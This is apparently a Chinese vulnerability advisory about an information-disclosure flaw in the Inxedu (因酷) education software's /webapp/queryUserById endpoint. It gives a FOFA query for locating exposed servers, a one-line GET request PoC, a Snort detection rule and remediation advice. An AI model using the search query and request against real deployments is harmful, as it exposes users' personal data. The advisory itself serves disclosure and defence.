跳转至

因酷教育软件-queryUserById-信息泄露

因酷教育软件-queryUserById-信息泄露,导致数据信息泄露或者导致服务器被控制。

影响版本

因酷教育软件

漏洞状态

漏洞细节 漏洞POC 漏洞EXP 在野利用
已公开 已公开 已知

风险等级

维度 评价
威胁等级 高危
影响面 广
攻击者价值
利用难度

漏洞复现

FOFA:body="/image/keupload?" && body="uploadSimpleUrl"

POC/EXP:

GET /webapp/queryUserById?id=7 HTTP/1.1
Host:127.0.0.1

image-20250911172217459

sonrt规则:

alert http any any -> $HOME_NET any (
    msg:"Incollege Education Software - User Information Disclosure via queryUserById";
    flow:to_server,established;
    http.method; content:"GET";
    http.uri; content:"/webapp/queryUserById";
    http.uri; content:"id=";
    metadata:
        cve none,
        service http,
        affected_product "因酷教育软件",
        vulnerability_type "Sensitive Information Disclosure",
        severity "medium";
    classtype:policy-violation;
    sid:1000503;
    rev:1;
    priority:2;
)

漏洞修复

关闭互联网暴露面或接口设置访问权限

升级至安全版本。